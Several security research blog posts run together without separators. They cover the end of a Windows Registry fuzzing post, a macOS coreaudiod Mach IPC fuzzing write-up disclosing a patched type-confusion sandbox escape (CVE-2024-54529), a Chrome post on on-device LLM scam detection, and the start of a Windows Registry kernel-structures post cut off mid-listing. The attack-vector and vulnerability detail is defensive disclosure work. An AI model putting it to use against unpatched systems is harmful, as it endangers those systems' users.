Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation.In particular, an interesting idea would be to use the self-healing property of the registry.Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process.We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.
As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data.
Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior.For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks.Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.
Conclusion
This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them.We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications.See you then!
Guest post by Dillon Franke, Senior Security Engineer, 20% time on Project Zero
Every second, highly-privileged MacOS system daemons accept and process hundreds of IPC messages. In some cases, these message handlers accept data from sandboxed or unprivileged processes.
In this blog post, I’ll explore using Mach IPC messages as an attack vector to find and exploit sandbox escapes. I’ll detail how I used a custom fuzzing harness, dynamic instrumentation, and plenty of debugging/static analysis to identify a high-risk type confusion vulnerability in the coreaudiod system daemon. Along the way, I’ll discuss some of the difficulties and tradeoffs I encountered.
Transparently, this was my first venture into the world of MacOS security research and building a custom fuzzing harness. I hope this post serves as a guide to those who wish to embark on similar research endeavors.
For this research project, I adopted a hybrid approach that combined fuzzing and manual reverse engineering, which I refer to as knowledge-driven fuzzing. This method, learned from my friend Ned Williamson, balances automation with targeted investigation. Fuzzing provided the means to quickly test a wide range of inputs and identify areas where the system’s behavior deviated from expectations. However, when the fuzzer’s code coverage plateaued or specific hurdles arose, manual analysis came into play, forcing me to dive deeper into the target’s inner workings.
Knowledge-driven fuzzing offers two key advantages. First, the research process never stagnates, as the goal of improving the code coverage of the fuzzer is always present. Second, achieving this goal requires a deep understanding of the code you are fuzzing. By the time you begin triaging legitimate, security-relevant crashes, the reverse engineering process will have given you extensive knowledge of the codebase, enabling analysis of crashes from an informed perspective.
The cycle I followed during this research is as follows:
Identify an attack vector
Choose a target
Create a fuzzing harness
Fuzz and produce crashes
Analyze crashes and code coverage
Iterate on the fuzzing harness
Repeat steps 4-6
Identify an Attack Vector
Standard browser sandboxing limits code execution by restricting direct operating system access. Consequently, exploiting a browser vulnerability typically requires the use of a separate “sandbox escape” vulnerability.
Since interprocess communication (IPC) mechanisms allow two processes to communicate with each other, they can naturally serve as a bridge from a sandboxed process to an unrestricted one. This makes them a prime attack vector for sandbox escapes, as shown below.
I chose Mach messages, the lowest level IPC component in the MacOS operating system, as the attack vector of focus for this research. I chose them mostly due to my desire to understand MacOS IPC mechanisms at their most core level, as well as the track record of historical security issues with Mach messages.
Previous Work and Background
Leveraging Mach messages in exploit chains is far from a novel idea. For example, Ian Beer identified a core design issue in 2016 with the XNU kernel related to the handling of task_t Mach ports, which allowed for exploitation via Mach messages. Another post showed how an in-the-wild exploit chain utilized Mach messages in 2019 for heap grooming techniques. I also drew much inspiration from Ret2 Systems’ blog post about leveraging Mach message handlers to find and weaponize a Safari sandbox escape.
I won’t spend too much time detailing the ins and outs of how Mach messages work, (that is better left to a more comprehensive post on the subject) but here’s a brief overview of Mach IPC for this blog post:
Mach messages are stored within kernel-managed message queues, represented by a Mach port
A process can fetch a message from a given port if it holds the receive right for that port
A process can send a message to a given port if it holds a send right to that port
MacOS applications can register a service with the bootstrap server, a special mach port which all processes have a send right to by default. This allows other processes to send a Mach message to the bootstrap server inquiring about a specific service, and the bootstrap server can respond with a send right to that service’s Mach port. MacOS system daemons register Mach services via launchd. You can view their .plist files within the /System/Library/LaunchAgents and /System/Library/LaunchDaemons directories to get an idea of the services registered. For example, the .plist file below highlights a Mach service registered for the Address Book application on MacOS using the identifier com.apple.AddressBook.AssistantService.
After deciding I wanted to research Mach services, the next question was which service to target. In order for a sandboxed process to send Mach messages to a service, it has to be explicitly allowed. If the process is using Apple’s App Sandbox feature, this is done within a .sb file, written using the TinyScheme format. The snippet below shows an excerpt of the sandbox file for a WebKit GPU Process. The allow mach-lookup directive is used to allow a sandboxed process to lookup and send Mach messages to a service.
This helped me narrow my focus significantly from all MacOS processes, to processes with a sandbox-accessible Mach service:
In addition to inspecting the sandbox profiles, I used Jonathan Levin’s sbtool utility to test which Mach services could be interacted with for a given process. The tool (which was a bit outdated, but I was able to get it to compile) uses the builtin sandbox_exec function under the hood to provide a nice list of accessible Mach service identifiers:
❯./sbtool2813mach
com.apple.logd
com.apple.xpc.smd
com.apple.remoted
com.apple.metadata.mds
com.apple.coreduetd
com.apple.apsd
com.apple.coreservices.launchservicesd
com.apple.bsd.dirhelper
com.apple.logind
com.apple.revision
…Truncated…
Ultimately, I chose to take a look at the coreaudiod daemon, and specifically the com.apple.audio.audiohald service for the following reasons:
It is a complex process
It allows Mach communications from several impactful applications, including the Safari GPU process
The Mach service had a large number of message handlers
The service seemed to allow control and and modification of audio hardware, which would likely require elevated privileges
The coreaudiod binary and the CoreAudio Framework it heavily uses were both closed source, which would provide a unique reverse engineering challenge
Create a Fuzzing Harness
Once I chose an attack vector and target, the next step was to create a fuzzing harness capable of sending input through the attack vector (a Mach message) at a proper location within the target.
A coverage-guided fuzzer is a powerful weapon, but only if its energy is focused in the right place—like a magnifying glass concentrating sunlight to start a fire. Without proper focus, the energy dissipates, achieving little impact.
Determining an Entry Point
Ideally, a fuzzer should perfectly replicate the environment and capabilities available to a potential attacker. However, this isn't always practical. Trade-offs often need to be made, such as accepting a higher rate of false positives for increased performance, simplified instrumentation, or ease of development. Therefore, identifying the “right place” to fuzz is highly dependent on the specific target and research goals.
Option 1: Interprocess Fuzzing
All Mach messages are sent and received using the mach_msg API, as shown below. Therefore, I thought the most intuitive way to fuzz coreaudiod‘s Mach message handlers would be to write a fuzzing harness that called the mach_msg API and allow my fuzzer to modify the message contents to produce crashes. The approach would look something like this:
However, this approach had a large downside: since we were sending IPC messages, the fuzzing harness would be in a different process space than the target. This meant code coverage information would need to be shared across a process boundary, which is not supported by most fuzzing tools. Additionally, kernel message queue processing adds a significant performance overhead.
Option 2: Direct Harness
While requiring a bit more work up front, another option was to write a fuzzing harness that directly loaded and called the Mach message handlers of interest. This would have the massive advantage of putting our fuzzer and instrumentation in the same process as the message handlers, allowing us to more easily obtain code coverage.
One notable downside of this fuzzing approach is that it assumes all fuzzer-generated inputs pass the kernel’s Mach message validation layer, which in a real system occurs before a message handler gets called.As we’ll see later, this is not always the case. In my view, however, the pros of fuzzing in the same process space (speed and easy code coverage collection) outweighed the cons of a potential increase in false positives.
The approach would be as follows:
Identify a suitable function for processing incoming mach messages
Write a fuzzing harness to load the message handling code from coreaudiod
Use a fuzzer to generate inputs and call the fuzzing harness
Profit, hopefully
Finding the Mach Messager Handler
To start, I searched for the Mach service identifier, com.apple.audioaudiohald, but found no references to it within the coreaudiod binary. Next, I checked the libraries it loaded using otool. Logically, the CoreAudio framework seemed like a good candidate for housing the code for our message handler.
$ otool -L /usr/sbin/coreaudiod
/usr/sbin/coreaudiod:
/System/Library/PrivateFrameworks/caulk.framework/Versions/A/caulk (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 2602.0.255)
/usr/lib/libAudioStatistics.dylib (compatibility version 1.0.0, current version 1.0.0, weak)
/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 2602.0.255)
/usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1700.255.5)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1345.120.2)
However, I was surprised to find that the path returned by otool did not exist!
A bit of research showed me that as of MacOS Big Sur, most framework binaries are not stored on disk but within the dyld shared cache, a mechanism for pre-linking libraries to allow applications to run faster. Thankfully, IDA Pro, Binary Ninja, and Ghidra support parsing the dyld shared cache to obtain the libraries stored within. I also used this helpful tool to successfully extract libraries for additional analysis.
Once I had the CoreAudio Framework within IDA, I quickly found a call to bootstrap_check_in with the service identifier passed as an argument, proving the CoreAudio framework binary was responsible for setting up the Mach service I wanted to fuzz. However, it still wasn’t obvious where the message handling code was happening, despite quite a bit of reverse engineering.
It turns out this is due to the use of the Mach Interface Generator, (MIG) an Interface Definition Language from Apple that makes it easier to write RPC clients and servers by abstracting away much of the Mach layer. When compiled, MIG message handling code gets bundled into a structure called a subsystem. One can easily grep for these subsystems to find their offsets:
Next, I searched in IDA for cross-references to the _HALS_HALB_MIGServer_subsystem symbol, which identified the MIG server function that parsed incoming Mach messages! The routine is shown below, with the first parameter (the rdi register) being the incoming Mach message and the second (the rsi register) being the message to return to the client. The MIG server function extracted the msgh_id parameter from the Mach message and used that to index into the MIG subsystem. Then, the necessary function handler was called.
I further confirmed this by setting an LLDB breakpoint on the coreaudiod process (after disabling SIP) for the _HALB_MIGServer_server function. Then, I adjusted the volume on my system, and the breakpoint was hit:
In this example, tracing the message handler called from the MIG subsystem showed the _XObject_HasProperty function was called based on the Mach message’s msgh_id.
Depending on the msgh_id, a few dozen message handlers were accessible from the MIG subsystem. They are easily identifiable by the convenient __X prefix to their function names added by MIG.
The _HALB_MIGServer_server function struck a great balance between getting close to low-level message handling code while still resembling the inputs that a call to mach_msg would take. I decided this was the place to inject fuzz input into.
Creating a Basic Fuzzing Harness
After identifying the function I wanted to fuzz, the next step was to write a program to read a file and deliver the file’s contents as input to the target function. This might have been as easy as linking the CoreAudio library with my fuzzing harness and calling the _HALB_MIGServer_server function, but unfortunately the function was not exported.
So, the high level function of my harness was as follows:
Load the CoreAudio Library
Get a function pointer for the target function from the CoreAudio Library
Read an input from a file
Call the target function with the input
The full implementation of my fuzzing harness can be found here. An example of invoking the harness to send a message from an input file is shown below:
I now had a way to deliver data directly into the MIG subsystem (_HALB_MIGServer_server) I wanted to fuzz. However, I had no idea the specific message size, options, or data the handler was expecting. While a coverage-guided fuzzer will begin to uncover the proper message format over time, it is advantageous to obtain a seed corpus of legitimate inputs when first beginning to fuzz to improve efficiency.
To do this, I used LLDB to set a breakpoint on the MIG subsystem and dump the first argument (containing the incoming Mach message). Then, I played around with the operating system to cause Mach messages to be sent to coreaudiod. The Audio MIDI Setup MacOS application ended up being great for this, as it allows one to create, edit, and delete audio devices.
Fuzz and Produce Crashes
Armed with a small seed corpus and an input delivery mechanism, the next step was to configure a fuzzer to use the created fuzzing harness and obtain code coverage. I used the excellent Jackalope fuzzer built and maintained by Ivan Fratric. I chose Jackalope primarily for its high level of customizability—it allows easy implementation of custom mutators, instrumentation, and sample delivery. Additionally, I appreciated its seamless usage on macOS, particularly its code coverage capabilities powered by TinyInst. In contrast, I tried and failed to collect code coverage using Frida against system daemons on macOS.
I used the following command to start a Jackalope fuzzing run:
This harness quickly generated many crashes, a sign I was on the right track. However, I quickly learned that initial crashes are often not indicative of a security bug, but of a design bug in the fuzzing harness itself or an invalid assumption.
Iteration 1: Target Initialization
One of the difficulties with my fuzzing approach was that my target function (the Mach message handler) expected the HAL system to be in a specific state to begin receiving Mach messages. By simply calling the library function with my fuzzing harness, these assumptions were broken.
This caused errors to start popping up. As shown in the diagram below, the harness bypassed much of the bootstrapping functionality the coreaudiod process would normally take care of during startup.
Code coverage, as well as error messages, can be very helpful in helping determine some of the initialization steps a fuzzing harness is neglecting. For example, I noticed my data flow would always fail early in most Mach message handlers, logging the message Error: there is no system.
It turns out I needed to initialize the HAL System before I could interact correctly with the Mach APIs. In my case, calling the _AudioHardwareStartServer function in my fuzzing harness took care of most of the necessary initialization.
Iteration 2: API Call Chaining
My first crack at a fuzzing harness was cool, but it made a pretty large assumption: all accessible Mach message handlers functioned independently of each other. As I quickly learned, this assumption was incorrect. As I ran the fuzzer, error messages like the following one started popping up:
The error seemed to indicate the SetPropertyData Mach handler was expecting a client to be registered via a previous Mach message. Clearly, the Mach handlers I was fuzzing were stateful and depended on each other to function properly. My fuzzing harness would need to take this into consideration in order to have any hope of obtaining good code coverage on the target.
This highlights a common problem in the fuzzing world: most coverage-guided fuzzers accept a single input, (a bunch of bytes) while many things we want to fuzz accept data in a completely different format, such as several arguments of different types, or even several function calls. This Google writeup explains the problem well, as does Ned Williamson’s OffensiveCon Talk from 2019.
To get around this limitation, we can use a technique I refer to as API Call Chaining, which considers each fuzz input as a stream that can be read from to craft multiple valid inputs. Thus, each fuzzing iteration would be capable of generating multiple Mach messages. This simple but important insight allows a fuzzer to explore the interdependency of separate function calls using the same code-coverage informed input.
The FuzzedDataProvider class, which is part of LibFuzzer but can be included as a header for use with any fuzzing harness, is a great choice for consuming a fuzz sample and transforming it into a more meaningful data type. Consider the following pseudocode:
This code transforms a blob of bytes into a mechanism that can repeatedly call APIs with fuzz data in a deterministic manner. What’s more, a coverage-guided fuzzer will be able to explore and identify a series of API calls that improves code coverage. From the fuzzer’s perspective, it is simply modifying an array of bytes, blissfully unaware of the additional complexity happening under the hood.
For example, my fuzzer quickly identified that most interactions with the audiohald service required a call to the _XSystem_Open message handler to register a client before most APIs could be called. The inputs the fuzzer saved to its corpus naturally reflected this fact over time.
Iteration 3: Mocking Out Buggy/Unneeded Functionality
Sometimes coverage plateaus, and a fuzzer struggles to explore new code paths. For example, say we’re fuzzing an HTTP server and it keeps getting stuck because it’s trying to read and parse configuration files on startup. If our focus was on the server’s request parsing and response logic, we might choose to mock out the functionality we don’t care about in order to focus the fuzzer’s code coverage exploration elsewhere.
In my fuzzing harness’ case, calling the initialization routines was causing my harness to try to register the com.apple.audio.audiohald Mach service with the bootstrap server, which was throwing an error because it was already registered by launchd. Since my harness didn’t need to register the Mach service in order to inject messages, (remember, our harness calls the MIG subsystem directly) I decided to mock out the functionality.
When dealing with pure C functions, function interposing can be used to easily modify a function’s behavior. In the example below, I declare a new version of the bootstrap_check_in function that just says returns KERN_SUCCESS, effectively nopping it out while telling the caller that it was successful.
In the case of C++ functions, I used TinyInst’s Hook API to modify problematic functionality. In one specific scenario, my fuzzer was crashing the target constantly because the CFRelease function was being called with a NULL pointer. Some further analysis told me that this was a non-security relevant bug where a user’s input, which was assumed to contain a valid plist object, was not properly validated. If the plist object was invalid or NULL, a downstream function call would contain NULL, and an abort would occur.
So, I wrote the following TinyInst hook, which checked whether the plist object passed into the function was NULL. If so, my hook returned the function call early, bypassing the buggy code.
printf("$RIP register is now: %p\n", GetRegister(ARCH_PC));
SetRegister(RSP, GetRegister(RSP) + 8); // Simulate a ret instruction
printf("$RSP is now: %p\n", GetRegister(RSP));
}
}
Next, I modified Jackalope to use my instrumentation using the CreateInstrumentation API. That way, my hook was applied during each fuzzing iteration, and the annoying NULLCFRelease calls stopped happening. The output below shows the hook preventing a crash from a NULLplist object passed the troublesome API:
The great thing about a fuzzing-centric auditing technique is that it highlights knowledge gaps in the code you are auditing. As you address these gaps, you gain a deeper understanding of the structure and constraints of the inputs that your fuzzing harness should generate. These insights enable you to refine your harness to produce more targeted inputs, effectively penetrating deeper code paths and improving overall code coverage. The following subsections highlight examples of how I identified and implemented opportunities to iterate on my fuzzing harness, significantly enhancing its efficiency and effectiveness.
Message Handler Syntax Checks
Code coverage results from fuzzing runs are incredibly telling. I noticed that after running my fuzzer for a few days, it was having trouble exploring past the beginning of most of the Mach message handlers. One simple example is shown below, (explored basic blocks are highlighted in blue) where several comparisons were not being passed , causing the function to error out early on. Here, the rdi register is the incoming Mach message we sent to the handler.
The comparisons were checking that the Mach message was well formatted, with a message length set to 0x34 and various options set within the message. If it wasn’t, it was discarded.
With this in mind, I modified my fuzzing harness to set the fields in the Mach messages I sent to the _XIOContext_SetClientControlPort handler such that they passed these conditions. The fuzzer could modify other pieces of the message as it pleased, but since these aspects needed to conform to strict guidelines, I simply hardcoded them.
These small modifications were the beginning of an input structure I was building for my target. The efficiency of my fuzzing improved astronomically after adding these guidelines to the fuzzer - my code coverage increased by 2000% shortly thereafter.
Out-of-Line (OOL) Message Data
I noticed my fuzzing setup started generating tons of crashes from a call to mig_deallocate, which frees a given address. At first, I thought I had found an interesting bug, since I could control the address passed to mig_deallocate:
I quickly learned, however, that Mach messages can contain various types of Out-of-line (OOL) data. This allows a client to allocate a memory region and place a pointer to it within the Mach message, which will be processed and, in some cases, freed by the message handler. When sending a Mach message with the mach_msg API, the XNU kernel will validate that the memory pointed to by OOL descriptors is properly owned and accessible by the client process.
I hadn’t found a vulnerability; my fuzzing harness was simply attached to the target at a point downstream which bypassed the normal memory checks that would have been performed by the kernel. To remedy this, I modified my fuzzing harnessto support allocating space for OOL data and passing the valid memory address within the Mach messages I fuzzed.
The Vulnerability
After many fuzzing harness iterations, lldb “next instruction” commands, and hours spent overheating my MacBook Pro, I had finally begun to acquire an understanding of the CoreAudio framework and generate some meaningful crashes.
But first, some background knowledge.
The Hardware Abstraction Layer (HAL)
The com.apple.audio.audiohald Mach service exposes an interface known as the Hardware Abstraction Layer (HAL). The HAL allows clients to interact with audio devices, plugins, and settings on the operating system, represented in the coreaudiod process as C++ objects of type HALS_Object.
In order to interact with the HAL, a client must first register itself. There are a few ways to do this, but the simplest is using the _XSystem_Open Mach API. Calling this API will invoke the HALS_System::AddClient method, which uses the Mach message’s audit token to create a client (clnt) HALS_Object to map subsequent requests to that client. The code block below shows an IDA decompilation snippet of the creation of a clnt object.
Stepping into the HALS_Object constructor, a mutex is acquired before getting the next available object ID before making a call to HALS_ObjectMap::MapObject.
The HALS_ObjectMap::MapObject function adds the freshly allocated object to a linked list stored on the heap. I wrote a program using the TinyInst Hook API that iterates through each object in the list and dumps its raw contents:
To modify an existing HALS_Object, most of the HAL Mach message handlers use the HALS_ObjectMap::CopyObjectByObjectID function, which accepts an integer ID (parsed from the Mach message’s body) for a given HALS_Object, which it then looks up in the Object Map and returns a pointer to the object.
For example, here’s a small snippet of the _XSystem_GetObjectInfo Mach message handler, which calls the HALS_ObjectMap::CopyObjectByObjectID function before accessing information about the object and returning it.
Whenever my fuzzer produced a crash, I always took the time to fully understand the crash’s root cause. Often, the crashes were not security relevant, (i.e. a NULL dereference) but fully understanding the reason behind the crash helped me understand the target better and invalid assumptions I was making with my fuzzing harness. Eventually, when I did identify security relevant crashes, I had a good understanding of the context surrounding them.
The first indication from my fuzzer that a vulnerability might exist was a memory access violation during an indirect call instruction, where the target address was calculated using an index into the rax register. As shown in the following backtrace, the crash occurred shallowly within the _XIOContext_Fetch_Workgroup_Port Mach message handler.
Further investigating the context of the crash in IDA, I noticed that the rax register triggering the invalid memory access was directly derived from a call to the HALS_ObjectMap::CopyObjectByObjectID function.
Specifically, it attempted the following:
Fetch a HALS_Object from the Object Map based on an ID provided in the Mach message
Dereference the address a1 at offset 0x68 of the HALS_Object
Dereference the address a2 at offset 0x0 of a1
Call the function pointer at offset 0x168 of a2
What Went Wrong?
The operations leading to the crash indicated that at offset 0x68 of the HALS_Object it fetched, the code expected a pointer to an object with a vtable. The code would then look up a function within the vtable, which would presumably retrieve the object’s “workgroup port.”
When the fetched object was of type ioct, (IOContext) everything functioned as normal. However, the test input my fuzzer generated was causing the function to fetch a HALS_Object of a different type, which led to an invalid function call. The following diagram shows how an attacker able to influence the pointer at offset 0x68 of a HALS_Object might hijack control flow.
This vulnerability class is referred to as a type confusion, where the vulnerable code makes the assumption that a retrieved object or struct is a specific type, but it is possible to provide a different one. The object’s memory layout might be completely different, meaning memory accesses and vtable lookups might occur in the wrong place, or even out of bounds. Type confusion vulnerabilities can be extremely powerful due to their ability to form reliable exploits.
Affected Functions
The _XIOContext_Fetch_Workgroup_Port Mach message handler wasn’t the only function that assumed it was dealing with an ioct object without checking the type. The table below shows several other message handlers that suffered from the same issue:
Apple did perform proper type checking on some of the Mach message handlers. For example, the _XIOContent_PauseIO message handler, shown below, calls a function that checks whether the fetched object is of type ioct before using it. It is not clear why these checks were implemented in certain areas, but not others.
The impact of this vulnerability can range from an information leak to control flow hijacking. In this case, since the vulnerable code is performing a function call, an attacker could potentially control the data at the offset read during the type confusion, allowing them to control the function pointer and redirect execution. Alternatively, if the attacker can provide an object smaller than 0x68 bytes, an out-of-bounds read would be possible, paving the way for further exploitation opportunities such as memory corruption or arbitrary code execution.
Creating a Proof of Concept
Because my fuzzing harness was connected downstream in the Mach message handling process, it was important to build an end-to-end proof-of-concept that used the mach_msg API to send a Mach message to the vulnerable message handler within coreaudiod. Otherwise, we might have triggered a false positive as we did in the case of the mig_deallocate crash where we thought we had a bug, but were actually just bypassing security checks.
In this case, however, the bug was triggerable using the mach_msg API, making it a legitimate opportunity for use as a sandbox escape. The proof-of-concept code I put together for triggering this issue on MacOS Sequoia 15.0.1 can be found here.
It’s worth noting that code running on Apple Silicon uses Pointer Authentication Codes (PACs) , which could make exploitation more difficult. In order to exploit this bug through an invalid vtable call, an attacker would need the ability to sign pointers, which would be possible if the attacker gained native code execution in an Apple-signed process. However, I only analyzed and tested this issue on x86-64 versions of MacOS.
How Apple Fixed the Issue
I reported this type confusion vulnerability to Apple on October 9, 2024. It was fixed on December 11, 2024, assigned CVE-2024-54529, and a patch was introduced in MacOS Sequoia 15.2, Sonoma 14.7.2, and Ventura 13.7.2. Interestingly, Apple mentions that the vulnerability allowed for code execution with kernel privileges. That part interested me, since as far as I could tell the execution was only possible as the _coreaudiod group, which was not equivalent to kernel privileges.
Apple’s fix was simple: since each HALS Object contains information about its type, the patch adds a check within the affected functions to ensure the fetched object is of type ioct before dereferencing the object and performing a function call.
You might have noticed how the offset derefenced within the HALS Object is 0x70 in the updated version, but was 0x68 in the vulnerable version. Often, such struct modifications are not security relevant, but will differ based on other bug fixes or added features.
Recommendations
To prevent similar type confusion vulnerabilities in the future, Apple should consider modifying the CopyObjectByObjectID function (or any others that make assumptions about an object’s type) to include a type check. This could be achieved by passing the expected object type as an argument and verifying the type of the fetched object before returning it. This approach is similar to how deserialization functions often include a template parameter to ensure type safety.
Conclusion
This blog post described my journey into the world of MacOS vulnerability research and fuzzing. I hope I have shown how a knowledge-driven fuzzing approach can allow rapid prototyping and iteration, a deep understanding of the target, and high impact bugs.
In my next post, I will perform a detailed walkthrough of my experience attempting to exploit CVE-2024-54529.
Posted by Jasika Bawa, Andy Lim, and Xinghui Lu, Google Chrome Security
Tech support scams are an increasingly prevalent form of cybercrime, characterized by deceptive tactics aimed at extorting money or gaining unauthorized access to sensitive data. In a tech support scam, the goal of the scammer is to trick you into believing your computer has a serious problem, such as a virus or malware infection, and then convince you to pay for unnecessary services, software, or grant them remote access to your device. Tech support scams on the web often employ alarming pop-up warnings mimicking legitimate security alerts. We've also observed them to use full-screen takeovers and disable keyboard and mouse input to create a sense of crisis.
Chrome has always worked with Google Safe Browsing to help keep you safe online. Now, with this week's launch of Chrome 137, Chrome will offer an additional layer of protection using the on-device Gemini Nano large language model (LLM). This new feature will leverage the LLM to generate signals that will be used by Safe Browsing in order to deliver higher confidence verdicts about potentially dangerous sites like tech support scams.
Initial research using LLMs has shown that they are relatively effective at understanding and classifying the varied, complex nature of websites. As such, we believe we can leverage LLMs to help detect scams at scale and adapt to new tactics more quickly. But why on-device? Leveraging LLMs on-device allows us to see threats when users see them. We’ve found that the average malicious site exists for less than 10 minutes, so on-device protection allows us to detect and block attacks that haven't been crawled before. The on-device approach also empowers us to see threats the way users see them. Sites can render themselves differently for different users, often for legitimate purposes (e.g. to account for device differences, offer personalization, provide time-sensitive content), but sometimes for illegitimate purposes (e.g. to evade security crawlers) – as such, having visibility into how sites are presenting themselves to real users enhances our ability to assess the web.
How it works
At a high level, here's how this new layer of protection works.
Overview of how on-device LLM assistance in mitigating scams works
When a user navigates to a potentially dangerous page, specific triggers that are characteristic of tech support scams (for example, the use of the keyboard lock API) will cause Chrome to evaluate the page using the on-device Gemini Nano LLM. Chrome provides the LLM with the contents of the page that the user is on and queries it to extract security signals, such as the intent of the page. This information is then sent to Safe Browsing for a final verdict. If Safe Browsing determines that the page is likely to be a scam based on the LLM output it receives from the client, in addition to other intelligence and metadata about the site, Chrome will show a warning interstitial.
This is all done in a way that preserves performance and privacy. In addition to ensuring that the LLM is only triggered sparingly and run locally on the device, we carefully manage resource consumption by considering the number of tokens used, running the process asynchronously to avoid interrupting browser activity, and implementing throttling and quota enforcement mechanisms to limit GPU usage. LLM-summarized security signals are only sent to Safe Browsing for users who have opted-in to the Enhanced Protection mode of Safe Browsing in Chrome, giving them protection against threats Google may not have seen before. Standard Protection users will also benefit indirectly from this feature as we add newly discovered dangerous sites to blocklists.
Future considerations
The scam landscape continues to evolve, with bad actors constantly adapting their tactics. Beyond tech support scams, in the future we plan to use the capabilities described in this post to help detect other popular scam types, such as package tracking scams and unpaid toll scams. We also plan to utilize the growing power of Gemini to extract additional signals from website content, which will further enhance our detection capabilities. To protect even more users from scams, we are working on rolling out this feature to Chrome on Android later this year. And finally, we are collaborating with our research counterparts to explore solutions to potential exploits such as prompt injection in content and timing bypass.
Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other dimension to explore: the multitude of kernel-mode objects allocated and maintained throughout the lifecycle of an active hive. These auxiliary objects are essential for several reasons:
To track all currently loaded hives, their properties (e.g., load flags), their memory mappings, and the relationships between them (especially for delta hives overlaid on top of each other).
To synchronize access to keys and hives within the multithreaded Windows environment.
To cache hive information for faster access compared to direct memory mapping lookups.
To integrate the registry with the NT Object Manager and support standard operations (opening/closing handles, setting/querying security descriptors, enforcing access checks, etc.).
To manage the state of pending transactions before they are fully committed to the underlying hive.
To address these diverse requirements, the Windows kernel employs numerous interconnected structures. In this post, we will examine some of the most critical ones, how they function, and how they can be effectively enumerated and inspected using WinDbg. It's important to note that Microsoft provides official definitions only for some registry-related structures through PDB symbols for ntoskrnl.exe. In many cases, I had to reverse-engineer the relevant code to recover structure layouts, as well as infer the types and names of particular fields and enums. Throughout this write-up, I will clearly indicate whether each structure definition is official or reverse-engineered. If you spot any inaccuracies, please let me know. The definitions presented here are primarily derived from Windows Server 2019 with the March 2022 patches (kernel build 10.0.17763.2686), which was the kernel version used for the majority of my registry code analysis. However, over 99% of registry structure definitions appear to be identical between this version and the latest Windows 11, making the information directly applicable to the latest systems as well.
Hive structures
Given that hives are the most intricate type of registry object, it's not surprising that their kernel-mode descriptors are equally complex and lengthy. The primary hive descriptor structure in Windows, known as _CMHIVE, spans a substantial 0x12F8 bytes – exceeding 4 KiB, the standard memory page size on x86-family architectures. Contained within _CMHIVE, at offset 0, is another structure of type _HHIVE, which occupies 0x600 bytes, as depicted in the diagram below:
This relationship mirrors that of other common Windows object pairs, such as _EPROCESS / _KPROCESS and _ETHREAD / _KTHREAD. Because _HHIVE is always allocated as a component of the larger _CMHIVE structure, their pointer types are effectively interchangeable. If you encounter a decompiled access using a _HHIVE* pointer that extends beyond the size of the structure, it almost certainly indicates a reference to a field within the encompassing _CMHIVE object.
But why are two distinct structures dedicated to representing a single registry hive? While technically not required, this separation likely serves to delineate fields associated with different abstraction layers of the hive. Specifically:
_HHIVE manages the low-level aspects of the hive, including the hive header, bins, and cells, as well as in-memory mappings and synchronization state with its on-disk counterpart (e.g., dirty sectors).
_CMHIVE handles more abstract information about the hive, such as the cache of security descriptors, pointers to high-level kernel objects like the root Key Control Block (KCB), and the associated transaction resource manager (_CM_RM structure).
The next subsections will provide a deeper look into the responsibilities and inner workings of these two structures.
_HHIVE structure overview
The primary role of the _HHIVE structure is to manage the memory-related state of a hive. This allows higher-level registry code to perform operations such as allocating, freeing, and marking cells as "dirty" without needing to handle the low-level implementation details. The _HHIVE structure comprises 49 top-level members, most of which will be described in larger groups below:
0:kd>dt_HHIVE
nt!_HHIVE
+0x000Signature:Uint4B
+0x008GetCellRoutine:Ptr64_CELL_DATA*
+0x010ReleaseCellRoutine:Ptr64void
+0x018Allocate:Ptr64void*
+0x020Free:Ptr64void
+0x028FileWrite:Ptr64long
+0x030FileRead:Ptr64long
+0x038HiveLoadFailure:Ptr64Void
+0x040BaseBlock:Ptr64_HBASE_BLOCK
+0x048FlusherLock:_CMSI_RW_LOCK
+0x050WriterLock:_CMSI_RW_LOCK
+0x058DirtyVector:_RTL_BITMAP
+0x068DirtyCount:Uint4B
+0x06cDirtyAlloc:Uint4B
+0x070UnreconciledVector:_RTL_BITMAP
+0x080UnreconciledCount:Uint4B
+0x084BaseBlockAlloc:Uint4B
+0x088Cluster:Uint4B
+0x08cFlat:Pos0,1Bit
+0x08cReadOnly:Pos1,1Bit
+0x08cReserved:Pos2,6Bits
+0x08dDirtyFlag:UChar
+0x090HvBinHeadersUse:Uint4B
+0x094HvFreeCellsUse:Uint4B
+0x098HvUsedCellsUse:Uint4B
+0x09cCmUsedCellsUse:Uint4B
+0x0a0HiveFlags:Uint4B
+0x0a4CurrentLog:Uint4B
+0x0a8CurrentLogSequence:Uint4B
+0x0acCurrentLogMinimumSequence:Uint4B
+0x0b0CurrentLogOffset:Uint4B
